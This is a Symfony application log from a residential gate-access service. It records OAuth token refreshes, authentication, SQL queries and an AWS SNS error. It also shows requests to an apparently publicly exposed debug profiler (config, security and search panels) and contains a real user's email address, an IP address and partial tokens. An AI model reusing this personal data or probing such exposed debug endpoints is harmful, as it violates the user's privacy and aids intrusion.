[2025-12-18 20:03:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 20:03:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=twig","method":"GET"} []
[2025-12-18 20:03:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 20:06:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1015b1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1015b1?panel=router","method":"GET"} []
[2025-12-18 20:06:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 20:12:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=request","method":"GET"} []
[2025-12-18 20:12:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 20:13:49] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"caf0ac","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/caf0ac/search/results?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
[2025-12-18 20:13:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
[2025-12-18 20:18:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=security","method":"GET"} []
[2025-12-18 20:18:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 20:20:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 20:21:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=config","method":"GET"} []
[2025-12-18 20:21:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 20:26:01] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-18 20:26:01] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-18 20:26:01] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["be6b1cddd474e5e6372d1ddea8 [...]"] []
[2025-12-18 20:26:01] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 20:26:01] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"c9585ddaf816f5b2cef3132cc5 [...]","3":"2025-12-18 20:56:01","4":"","5":375,"6":"[]"} []
[2025-12-18 20:26:01] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 20:26:01] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 20:26:01] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"48d0524dffadf644c34a65c2d7 [...]","3":"2026-02-16 20:26:01","4":"","5":375,"6":"[]"} []
[2025-12-18 20:26:01] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 20:26:01] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 20:26:01] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"be6b1cddd474e5e6372d1ddea8 [...]"] []
[2025-12-18 20:26:01] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 20:26:02] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-18 20:26:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 20:26:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:26:02] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:26:02] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
[2025-12-18 20:26:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 20:26:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:02] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["586cd940-fe5c-40f9-b203-99 [...]"] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [375,1] []
[2025-12-18 20:26:03] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a725d03d-0217-4179-9082-5a05b0a9293e/invitation/10/0?order=desc","method":"GET"} []
[2025-12-18 20:26:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 20:26:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [375,1] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [375,251] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:26:03] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:26:03] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["E9690C4C-7479-437B-82D6-F9 [...]",1,375] []
[2025-12-18 20:26:03] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.uuid = ? LIMIT 1 ["4cf416c3-f8a2-4b97-aec0-5e [...]"] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [251,1] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [251,1] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [417] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.uuid = ? LIMIT 1 ["4cf416c3-f8a2-4b97-aec0-5e [...]"] []
[2025-12-18 20:26:03] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 20:26:03] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 20:26:03] doctrine.DEBUG: UPDATE device SET date_created = ?, date_modified = ? WHERE id = ? ["2022-11-28 02:48:14","2025-12-18 20:26:03",566] []
[2025-12-18 20:26:03] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT d0_.id AS id_0, d0_.uuid AS uuid_1, d0_.status AS status_2, d0_.date_created AS date_created_3, d0_.date_modified AS date_modified_4, d0_.guid AS guid_5, d0_.endpoint_arn AS endpoint_arn_6, d0_.token AS token_7, d0_.identifier AS identifier_8, d0_.model AS model_9, d0_.os AS os_10, d0_.app_version AS app_version_11, d0_.arn_status AS arn_status_12, d0_.type AS type_13, d0_.app AS app_14, d0_.user_id AS user_id_15 FROM device d0_ WHERE (d0_.token = ?) AND (d0_.uuid <> ?) ["925b97ba1533870e655db98c25 [...]","4cf416c3-f8a2-4b97-aec0-5e [...]"] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.status = ? [375,1] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [251] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [375,251] []
[2025-12-18 20:26:03] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.arn AS arn_7, t0.type AS type_8 FROM topic t0 WHERE t0.name = ? LIMIT 1 ["residential-7ff0f4e0-7d46- [...]"] []
[2025-12-18 20:26:03] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "Subscribe" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClie (truncated...) InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClientTokenId</Code> <Message>The security token included in the request is invalid.</Message> </Error> <RequestId>f6702d27-6810-5b57-9cbd-4c990d8b3c15</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"Subscribe\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClientTokenId</Code>\n <Message>The security token included in the request is invalid.</Message>\n </Error>\n <RequestId>f6702d27-6810-5b57-9cbd-4c990d8b3c15</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
[2025-12-18 20:26:03] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 20:26:07] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/a725d03d-0217-4179-9082-5a05b0a9293e/providers","method":"GET"} []
[2025-12-18 20:26:07] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-18 20:26:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["c9585ddaf816f5b2cef3132cc5 [...]"] []
[2025-12-18 20:26:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 20:26:07] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-18 20:26:07] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-18 20:26:07] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 20:26:07] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
